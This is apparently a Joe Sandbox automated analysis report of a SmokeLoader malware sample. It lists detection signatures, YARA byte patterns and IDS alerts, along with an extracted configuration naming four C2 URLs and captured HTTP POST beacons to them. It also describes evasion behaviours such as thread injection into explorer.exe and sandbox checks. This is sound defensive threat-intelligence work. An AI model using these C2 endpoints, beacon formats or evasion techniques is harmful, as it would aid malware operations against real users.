Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1538051
MD5:6495432f0808eb94291d12c862216fe2
SHA1:b26485ed3ee5990d1c8363e743d8e0903e2b3433
SHA256:4dcf43767f4fd901ef13a37da7499a54c61cf045a045186151a8bbefc251ee6b
Tags:exeuser-Bitsight
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Benign windows process drops PE files
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected SmokeLoader
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Checks if the current machine is a virtual machine (disk enumeration)
Creates a thread in another existing process (thread injection)
Deletes itself after installation
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to read the PEB
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sigma detected: Execution of Suspicious File Type Extension
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • file.exe (PID: 6652 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6495432F0808EB94291D12C862216FE2)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
  • wdhwgdv (PID: 4476 cmdline: C:\Users\user\AppData\Roaming\wdhwgdv MD5: 6495432F0808EB94291D12C862216FE2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
SmokeLoaderThe SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.
  • SMOKY SPIDER
https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader
{"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
SourceRuleDescriptionAuthorStrings
00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x11ce3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
  • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x234:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000005.00000002.1991730217.00000000005E0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
    • 0x11ce3:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
    Click to see the 7 entries

    System Summary

    barindex
    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\wdhwgdv, CommandLine: C:\Users\user\AppData\Roaming\wdhwgdv, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\wdhwgdv, NewProcessName: C:\Users\user\AppData\Roaming\wdhwgdv, OriginalFileName: C:\Users\user\AppData\Roaming\wdhwgdv, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\wdhwgdv, ProcessId: 4476, ProcessName: wdhwgdv
    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2024-10-20T06:02:29.062843+020020391031A Network Trojan was detected192.168.2.456798181.123.219.2380TCP
    2024-10-20T06:03:47.872011+020020391031A Network Trojan was detected192.168.2.457004181.123.219.2380TCP
    2024-10-20T06:04:03.773750+020020391031A Network Trojan was detected192.168.2.457064181.123.219.2380TCP
    2024-10-20T06:04:21.852569+020020391031A Network Trojan was detected192.168.2.457074181.123.219.2380TCP
    2024-10-20T06:04:37.747088+020020391031A Network Trojan was detected192.168.2.457075181.123.219.2380TCP
    2024-10-20T06:04:54.668067+020020391031A Network Trojan was detected192.168.2.457076181.123.219.2380TCP
    2024-10-20T06:05:13.486893+020020391031A Network Trojan was detected192.168.2.457077152.231.120.380TCP
    2024-10-20T06:05:33.359838+020020391031A Network Trojan was detected192.168.2.459097152.231.120.380TCP
    2024-10-20T06:05:50.361206+020020391031A Network Trojan was detected192.168.2.459098152.231.120.380TCP

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Source: file.exeAvira: detected
    Source: C:\Users\user\AppData\Roaming\wdhwgdvAvira: detection malicious, Label: HEUR/AGEN.1306978
    Source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://tnc-corp.ru/tmp/index.php", "http://volisc.biz/tmp/index.php", "http://livbev.online/tmp/index.php", "http://liverds.at/tmp/index.php"]}
    Source: volisc.bizVirustotal: Detection: 6%Perma Link
    Source: liverds.atVirustotal: Detection: 5%Perma Link
    Source: livbev.onlineVirustotal: Detection: 6%Perma Link
    Source: C:\Users\user\AppData\Roaming\wdhwgdvReversingLabs: Detection: 40%
    Source: file.exeReversingLabs: Detection: 40%
    Source: file.exeVirustotal: Detection: 41%Perma Link
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
    Source: C:\Users\user\AppData\Roaming\wdhwgdvJoe Sandbox ML: detected
    Source: file.exeJoe Sandbox ML: detected
    Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: C:\Users\user\Desktop\file.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

    Networking

    barindex
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:56798 -> 181.123.219.23:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57004 -> 181.123.219.23:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57077 -> 152.231.120.3:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57075 -> 181.123.219.23:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:59098 -> 152.231.120.3:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:59097 -> 152.231.120.3:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57074 -> 181.123.219.23:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57064 -> 181.123.219.23:80
    Source: Network trafficSuricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:57076 -> 181.123.219.23:80
    Source: C:\Windows\explorer.exeNetwork Connect: 181.123.219.23 80Jump to behavior
    Source: C:\Windows\explorer.exeNetwork Connect: 152.231.120.3 80Jump to behavior
    Source: Malware configuration extractorURLs: http://tnc-corp.ru/tmp/index.php
    Source: Malware configuration extractorURLs: http://volisc.biz/tmp/index.php
    Source: Malware configuration extractorURLs: http://livbev.online/tmp/index.php
    Source: Malware configuration extractorURLs: http://liverds.at/tmp/index.php
    Source: Joe Sandbox ViewASN Name: TelecelSAPY TelecelSAPY
    Source: Joe Sandbox ViewASN Name: ENTELCHILESACL ENTELCHILESACL
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kquacpdyiao.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dokhxstskamwqb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 297Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xueqsaqwudqkfjhf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 126Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gepbcyyudpal.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 269Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fesuvivdhkbb.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nsdytqsgostosx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hiqciwywnoxbutl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qwkcueenkbefpetu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 132Host: tnc-corp.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdgawojgabqorytu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 174Host: tnc-corp.ru
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: global trafficDNS traffic detected: DNS query: tnc-corp.ru
    Source: global trafficDNS traffic detected: DNS query: volisc.biz
    Source: global trafficDNS traffic detected: DNS query: livbev.online
    Source: global trafficDNS traffic detected: DNS query: liverds.at
    Source: unknownHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kquacpdyiao.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 169Host: tnc-corp.ru
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1737667705.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
    Source: explorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
    Source: explorer.exe, 00000001.00000000.1741445546.00000000098A8000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
    Source: explorer.exe, 00000001.00000000.1733386877.0000000007F40000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1733724160.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1741619772.0000000009B60000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C893000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/Vh5j3k
    Source: explorer.exe, 00000001.00000000.1732800538.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/odirmr
    Source: explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/
    Source: explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/q
    Source: explorer.exe, 00000001.00000000.1731802146.0000000003700000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1731345025.0000000001240000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
    Source: explorer.exe, 00000001.00000000.1737667705.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
    Source: explorer.exe, 00000001.00000000.1737667705.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
    Source: explorer.exe, 00000001.00000000.1737667705.00000000096DF000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://arc.msn.comi
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://excel.office.com
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://outlook.com_
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.comcember
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C557000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://wns.windows.com/L
    Source: explorer.exe, 00000001.00000000.1742823051.000000000C5AA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
    Source: explorer.exe, 00000001.00000000.1732800538.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com:443/en-us/feed
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
    Source: explorer.exe, 00000001.00000000.1732800538.0000000007900000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

    Key, Mouse, Clipboard, Microphone and Screen Capturing

    barindex
    Source: Yara matchFile source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991788095.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000000.00000002.1749170921.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000005.00000002.1991819627.0000000000651000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

    System Summary

    barindex
    Source: 00000000.00000002.1749095157.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.1749137069.0000000000620000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.1749393819.00000000021F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
